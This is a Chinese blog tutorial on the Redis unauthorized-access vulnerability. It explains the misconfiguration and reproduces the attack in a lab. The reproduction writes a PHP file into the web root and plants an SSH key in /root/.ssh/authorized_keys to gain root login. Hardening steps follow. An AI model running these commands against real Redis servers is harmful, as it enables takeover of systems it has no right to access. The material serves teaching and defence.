redis 登录_Redis匿名访问漏洞

最新推荐文章于 2022-10-21 12:53:06 发布
最新推荐文章于 2022-10-21 12:53:06 发布
阅读量638 收藏
点赞数
文章标签: redis 登录 redis登录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39689819/article/details/111296085
版权
本文介绍了Redis匿名访问漏洞的原理,复现过程及修复措施。默认配置下,Redis可能允许任意用户免密登录,导致数据安全风险。修复方案包括低权限运行Redis、设置密码认证、禁止危险命令及限制外网访问。
摘要由CSDN通过智能技术生成

简介

Redis匿名访问漏洞也被称为 Redis未授权访问漏洞。是由于 Redis服务本身的特性及其运维不当造成的

Redis数据库介绍

Redis是一个数据库系统,其项目也在 github上开源。 Redis是一个高性能的 key-value的 NOSQL数据库系统, Redis使用 ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型的数据库系统。

Redis的储存方式

Redis的数据虽然被写入到内存中,但是可以被保存到硬盘里,保存的形式一般有两种: RDB和 AOF。 RDB的储存形式类似于 ,MySQL调用 msqldump来储存数据,而 AOF的储存形式则是把 Redis里生成数据的过程步骤给保存到一个文件里。

漏洞原理

Redis的默认配置文件中,会绑定 0.0.0.0:6379,这样 Redis会监听一切 IP,接收一切 IP的请求。如果没有采用添加防火墙规则等相关安全策略来屏蔽非信任来源 IP访问的话,会使 Redis服务暴露在公网,从而被任意用户请求来进行登录。 Redis默认没有设置密码认证,没有进行相应的密码验证会导致任意 用户免密登录 Redis,从而读取 Redis的数据、篡改 Redis的数据或者更高危的操作。

安装Redis

$ wget

$ tar -zxvf redis

$ cd redis/

$ make && make install

$ make test

配置部署

测试环境

靶机 IP:192.168.1.10 渗透机 IP:192.168.1.11

Redis的配置

# 配置配置文件

$ cat redis.config

daemonize yes  # 以守护进程方式运行

port 6379  # 绑定本机端口

dir "."

logfile "redis-6379.log  # 日志文件

protected-mode no # 关闭保护模式

# 启动Redis

$ redis-server redis-hack.conf

Redis的 protected-mode是 3.2后加入的新特性,因为我这里使用的是 4.0的版本,要复现的话要关闭。

漏洞复现过程

登录

在 192.168.1.11主机上,因为 Redis没有做任何安全措施,所以可以直接登录:

$ redis-cli -h 192.168.1.10 -p 6379

登录成功。 9de63088f8ae68ad67ec4a05b5ca86ef.png

写WebShell

原理

Redis运行时的数据都保存在内存中,如果想要备份数据,可以以 RDB的形式保存在硬盘。

操作

192.168.1.10:6379> config set dir /var/www/html/ # 把要保存的RDB文件设置要网站根目录下、

192.168.1.10:6379> config set dbfilename hack.php # 拿Webshell

192.168.1.10:6379> set webshell "<?php phpinfo();>"  # 把一个叫做webshell的key的值设置成phpinfo函数

192.168.1.10:6379> bgsave # 调用Redis的RDB保存命令

1b9317bfcb29c0d347108f62a62881fa.png 浏览器访问 192.168.1.10/redis.php,看到 phpinfo函数执行成功: e88a85b1dc16d65ca2eaafc03db82f84.png这就意味我们有更多的东西可以写入,包括写入 WebShell等等。

配置免密登录

生成ssh-keygen

先在 192.168.1.11的渗透主机上生成 ssh的私钥与公钥:

$ ssh-keygen -t rsa

$ (echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > hack.txt # 保存公钥到hack.txt中

$ cat hack.txt | redis-cli -h 192.168.1.10 -p 6379 -x set hack-it  # 把公钥写入到redis主机

OK

再在 192.168.1.11的渗透主机上登录 Redis主机:

$ redis-cli -h 192.168.1.10 -p 6379

登录成后配置 RDB的储存方式:

192.168.1.10:6379> config set dir /root/.ssh/

192.168.1.10:6379> config set dbfilename authorized_keys

192.168.1.10:6379> bgsave  # fork一个子进程进行RDB的保存

8b7a34b6e4a1a7d433e35c5b73c961fa.png然后通过 ssh连接机器:

$ ssh -i id_rsa root@192.168.1.10

可以看到登录成功。 10abbaf0cc1dff8e17f69fe3feef21bd.png

修复

低权限运行Redis

避免 root用户启动 Redis服务。而选择一些权限比较低的用户运行 Redis

$ groupadd -r redis && useradd -r -g redis redis

禁止命令

通过修改配置文件来禁止一些高风险的命令。

$ vim redis.conf

...

rename-command FLUSHALL ""

rename-command CONFIG   ""

rename-command EVAL     ""

...

添加密码认证

通过配置文件

$ vim redis.conf

requirepass PASSWORD

也可以通过 Redis的命令行:

127.0.0.1:6379> config set requirepass PASSWORD

禁止外网访问

通过防火墙等配置来禁止外网访问。

总结

Redis匿名访问漏洞由不安全的运维配置引起的,作为配置 Redis的开发人员或运维人员一定要有一定的安全意识,才能更好的实现真正的安全。

weixin_39689819
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis未授权访问漏洞
m0_61506558的博客
09-10 864
VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件,由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于UNXI和Linux的免费开源软件,由VNC Server和VNC View两部分组成。VNC默认端口号为5900、5901。VNC未授权访问漏洞如果被利用可能造成恶意用户直接控制target主机。
Java开发常见面试题详解(LockSupport,AQS,Spring循环依赖,Redis
热门推荐
KISS
03-28 3万+
00_前言闲聊和课程说明 教学视频 暖身面试题 Redis默认端口是多少?- 6379 link Spring官网地址 - https://spring.io 经典计算机图书看过吗? 01_字符串常量Java内部加载-上 Returns a canonical representation for the string object. A pool of strings, initially empty, is maintained privately by the class String. Whe
redis无密码登录
m0_67401228的博客
04-07 2053
redis的配置文件redis.conf中,Redis3.2加入的新特性,开启保护模式。即开启了protected-mode,默认值为 protected-mode =yes 是说redis只允许本机登录。 这样登录的前提是要设置密码,即要requirepass属性, requirepass =你设置的密码 如要无密码登录,就要设置protected-mode =no ,即可 ...
Redis
qq_39224439的博客
10-17 200
Redis 简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库 非关系型数据库的一种,经常用作缓存 官网:redis.io,中文网:redis.cn 丰富的数据类型:字符串、哈希、列表、集合、有序集合等 端口:6379 安装:sudo apt-get install red...
redis配置外部访问
weixin_34336526的博客
12-07 173
iptables -I INPUT 4 -p tcp -m state --state NEW -m tcp --dport 6379 -j ACCEPT 开放6379端口
.anonymous springsecurity需要登陆嘛_springboot+springsecurity短信认证+redis整合
weixin_42401137的博客
12-08 155
关注公众号【Ccww笔记】,获取干货资料 现在主流的登录方式主要有 3 种:账号密码登录、短信验证码登录和第三方授权登录,前面一节Spring security(三)---认证过程已分析了spring security账号密码方式登陆,现在我们来分析一下spring security短信方式认证登陆。 Spring security 短信方式、IP验证等类似模式登录方式验证,可以根...
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
redis权限webshell1
08-08
然而,Redis 的默认安装配置存在一个严重的安全问题,即可以匿名访问 Redis 服务器,而无需密码。 问题的根源在于 Redis 的配置文件/etc/redis.conf 中的 bind-ip 设置。如果将其设置为 0.0.0.0,则允许外网访问 ...
未授权访问漏洞
snowy_y的博客
06-23 917
未授权访问
未授权访问漏洞总结
墨鱼菜鸡
07-28 316
目录 一、MongoDB 未授权访问漏洞 二、Redis 未授权访问漏洞 三、Memcached 未授权访问漏洞CVE-2013-7239 四、JBOSS 未授权访问漏洞 五、VNC 未授权访问漏洞 六、Docker 未授权访问漏洞 七、ZooKeeper 未授权访问漏洞 八、Rsync 未...
docker安装redis5,并通过redis可视化工具连接容器安装的redis
qq_40750454的博客
03-25 707
1.创建一个Dockerfile文件,文件内容如下:(注:expose为开放6379端口) FROM centos:centos7 RUN groupadd -r redis && useradd -r -g redis redis RUN yum update -y ; \ yum -y install gcc automake autoconf libtool make wget epel-release gcc-c++; RUN mkdir -p /usr/src/red
ftp匿名登录 漏洞复现
HEAVEN569的博客
03-12 9117
1.FTP协议介绍 FTP,文件传输协议,是TCP/IP协议组中的协议之一属于传输层协议,由C/S(客户端/服务端)组成,默认情况下FTP协议使用TCP端口中的 20和21这两个端口。 在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。 2.FTP匿名漏洞综述 目标开启了匿名FTP服务匿名FTP允许任意用户通过FTP来访问开放的目录和文件 恶意攻击者可以通过匿名FTP来访问开放的文件或目录来收集信息进.
Redis 未授权访问漏洞利用及修复
Thunderclap的博客
06-25 4000
Redis 未授权访问漏洞利用及修复
Redis系列漏洞总结
NLost
10-21 6391
未授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
转:Redis使用认证密码登录
weixin_30824599的博客
05-16 1723
Redis默认配置是不需要密码认证的,也就是说只要连接的Redis服务器的host和port正确,就可以连接使用。这在安全性上会有一定的问题,所以需要启用Redis的认证密码,增加Redis服务器的安全性。 1. 修改配置文件 Redis的配置文件默认在/etc/redis.conf,找到如下行: #requirepass foobared 去掉前面的注释,并修改为所需要的密码: req...
Redis未授权访问漏洞修复
weixin_33711647的博客
10-17 333
1.禁止一些高危命令(重启redis才能生效) 修改 redis.conf 文件,禁用远程修改 DB 文件地址 rename-command FLUSHALL"" rename-command CONFIG"" rename-command EVAL"" 或者通过修改redis.conf文件,改变这些高危命令的名称 rena...
redis5.0安装和开机启动
tangbin0505的博客
08-24 425
一,添加用户,下载,授权,安装 useradd -s /sbin/nolog -M redis wget http://download.redis.io/releases/redis-5.0.7.tar.gz tar -zvxf redis-5.0.7.tar.gz mv /root/redis-5.0.7 /usr/local/redis chown -R redis.redis /usr/local/redis chmod -R 755 /usr/local/redis cd /usr/loca
redis攻与防
哼°
02-09 141
redis攻与防   思路: 将入侵者(centos201)的公钥写入到被入侵者(centos200,没有安全措施redis服务器)上,从而达到直联centos200的目的。    1、生成本机公钥(centos201) ssh-keygen -t rsa   2、在本机执行命令完成入侵 redis-cli -h centos200 -p 6379 config set di...
请务必注意 Redis 安全配置,否则将导致轻松被入侵
多看多听多总结
12-16 4371
一、前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本, 扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的 考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查。 二、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Red
python redis redis_connect_func
最新发布
09-10
def redis_connect_func(): # 连接到Redis数据库 r = redis.Redis(host='localhost', port=6379, db=0) # 进行一些操作 r.set('key', 'value') value = r.get('key') # 关闭连接 r.close() return ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值